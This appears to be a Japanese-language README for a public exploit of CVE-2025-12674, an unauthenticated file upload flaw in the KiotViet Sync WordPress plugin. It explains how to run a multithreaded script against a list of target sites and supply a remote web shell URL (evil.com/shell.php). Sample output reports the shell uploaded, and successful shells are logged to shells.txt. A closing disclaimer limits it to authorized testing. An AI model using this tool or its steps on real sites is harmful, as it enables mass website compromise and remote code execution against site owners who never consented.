
KiotViet Sync <= 1.8.5 - 認証なしの任意ファイルアップロード
KiotViet Sync <= 1.8.5 - 未認証の任意ファイルアップロード
WordPress 用プラグイン KiotViet Sync(1.8.5 以下のバージョン)は、create_media() 関数におけるファイルタイプ検証の欠如により、任意ファイルアップロードに対して脆弱です。
この脆弱性により、未認証の攻撃者がサーバーに任意のファイルをアップロードできるようになり、リモートコード実行につながる可能性があります。
このリポジトリをクローンするか、スクリプトをダウンロードしてください。
ターゲットを準備します:
list.txt というファイルに1行につき1つのターゲットを記述してください。
example.com
site2.com
http://site3.com
エクスプロイトスクリプトを実行します:
スクリプト名は次のとおりです:
CVE-2025-12674.py
python3 CVE-2025-12674.py
プロンプトが表示されたら、オプションを入力してください:
Enter targets file name (default: list.txt): list.txt
Enter number of threads (default: 10):
Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ Loaded 1 targets. Threads: 10. │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ http://nxk.ddev.site │
│ Trying KiotViet exploit... │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ ✔ Shell uploaded! ║
║ Check here: ║
║ http://nxk.ddev.site/wp-content/uploads/2026/01/ ║
║ ║
╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
Summary
Metric Value
───────────────────────────
Total attempts 1
Successful shells 1
Failed attempts 0
shells.txt に保存されます。このスクリプトは、教育目的および許可されたセキュリティテストの目的でのみ提供されています。
所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は、違法かつ非倫理的です。
作者は、誤用や引き起こされた損害について一切の責任を負いません。
Nxploited (Khaled Alenazi)